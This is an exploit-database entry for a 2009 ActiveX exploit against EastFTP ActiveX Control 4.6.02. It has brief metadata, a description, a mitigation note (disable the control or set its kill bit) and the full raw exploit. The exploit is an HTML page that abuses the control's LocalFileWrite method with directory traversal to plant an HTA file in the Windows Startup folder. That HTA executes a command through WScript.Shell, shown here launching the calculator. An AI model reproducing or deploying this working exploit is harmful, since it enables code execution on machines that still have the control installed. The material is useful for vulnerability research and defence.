header-logo
Suggest Exploit
vendor:
EastFTP ActiveX Control
by:
Dr_IDE
9,3
CVSS
HIGH
ActiveX Control 0-Day Local Exploit
95
CWE
Product Name: EastFTP ActiveX Control
Affected Version From: 4.6.02
Affected Version To: 4.6.02
Patch Exists: NO
Related CWE: N/A
CPE: ftpocx.com/download.htm
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Windows
2009

EastFTP ActiveX Control 0Day

An attacker can exploit this vulnerability by creating a malicious HTA file and using the LocalFileWrite method of the FtpLibrary ActiveX control to write the malicious HTA file to the startup folder of the target system. This will cause the malicious HTA file to be executed when the system is restarted.

Mitigation:

Disable the ActiveX control in the browser or set the kill bit for the vulnerable ActiveX control.
Source

Exploit-DB raw data:

#################################################################
#
# EastFTP ActiveX Control 0Day
# By: Dr_IDE
# Vendor Homepage:http://www.ftpocx.com/download.htm
# Version: 4.6.02
#
# Self Promotion: http://irresponsibledisclosure.blogspot.com
#################################################################

<html>
<object classid='clsid:31AE647D-11D1-4E6A-BE2D-90157640019A' id='target'/></object>
<script>
var sofa = "..\\..\\..\\..\\..\\..\\..\\..\\..\\Documents and Settings\\All Users\\Start Menu\\Programs\\Startup\\the_doctor_is_in.hta";
var king = "><" + "SCRIPT> var x=new ActiveXObject(\"WScript.Shell\"); x.Exec(\"CALC.EXE\"); <" +"/SCRIPT>";
var easy = 1;
target.LocalFileWrite(sofa,king,easy);
</script>
<body>
EaseFTP ActiveX Control 0-Day Local Exploit<br>
By: Dr_IDE<br>
Self Promotion: http://irresponsibledisclosure.blogspot.com<br>
Vendor Homepage:http://www.ftpocx.com/download.htm<br>
Version: 4.6.02<br>
Class FtpLibrary<br>
GUID: {31AE647D-11D1-4E6A-BE2D-90157640019A}<br>
Number of Interfaces: 1<br>
Default Interface: _FtpLibrary<br>
RegKey Safe for Script: False<br>
RegkeySafe for Init: False<br>
KillBitSet: False<br>
</body>
</html>

Navigation

Suggest Exploit

Services By CQR